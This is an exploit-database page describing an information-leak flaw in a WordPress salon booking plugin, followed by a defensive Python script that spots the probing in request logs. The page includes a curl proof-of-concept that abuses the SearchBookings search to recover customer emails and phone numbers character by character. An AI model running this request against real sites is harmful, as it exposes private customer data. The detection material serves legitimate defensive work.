## https://sploitus.com/exploit?id=WPEX-ID:E8F32E0B-4A89-460B-BB78-7C83EF5E16B4
Although the API returns only the customer's name, the search feature can be abused to leak email addresses and phone numbers. For example, searching for "a@", "b@", "c@"... determines an email address character by character.

```bash
curl -X POST https://example.com/wp-admin/admin-ajax.php -d 'action=salon&day=2022-03-11&search=%40&method=SearchBookings'
```
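For detection, the character-by-character search pattern described above can be spotted in request logs. The following is an added example, not code from the original page or from the plugin. It assumes a WAF or reverse proxy records the client IP and the urlencoded POST body; the function names, the record shape and the `min_steps` threshold are hypothetical.

```python
from collections import defaultdict
from urllib.parse import parse_qs

def search_terms_by_client(records):
    """Group SearchBookings search terms by client IP, in arrival order."""
    terms = defaultdict(list)
    for ip, body in records:
        q = parse_qs(body, keep_blank_values=True)
        # Only the AJAX call shown on the page: action=salon, method=SearchBookings.
        if q.get("action") == ["salon"] and q.get("method") == ["SearchBookings"]:
            terms[ip].append(q.get("search", [""])[0])
    return terms

def is_probe_step(prev, cur):
    """True when cur is prev with one character changed or one character added."""
    if len(cur) == len(prev):
        return sum(a != b for a, b in zip(prev, cur)) == 1
    if len(cur) == len(prev) + 1:
        return cur.startswith(prev) or cur.endswith(prev)
    return False

def flag_enumeration(records, min_steps=4):
    """Return {ip: step_count} for clients whose consecutive searches walk a value."""
    flagged = {}
    for ip, terms in search_terms_by_client(records).items():
        steps = sum(is_probe_step(p, c) for p, c in zip(terms, terms[1:]))
        if steps >= min_steps:  # assumed threshold; tune against normal staff usage
            flagged[ip] = steps
    return flagged

# Constructed sample records: (client IP, urlencoded POST body).
BASE = "action=salon&day=2022-03-11&method=SearchBookings&search="
SAMPLE = (
    [("203.0.113.7", BASE + t) for t in ["a%40", "b%40", "c%40", "ac%40", "bc%40", "cc%40"]]
    + [("198.51.100.2", BASE + t) for t in ["Alice", "Bob"]]
    + [("198.51.100.9", "action=heartbeat")]
)

if __name__ == "__main__":
    print(flag_enumeration(SAMPLE))
```

A client searching for whole names produces no steps, while a client varying one character at a time accumulates them quickly, which is what makes the pattern separable from normal booking lookups.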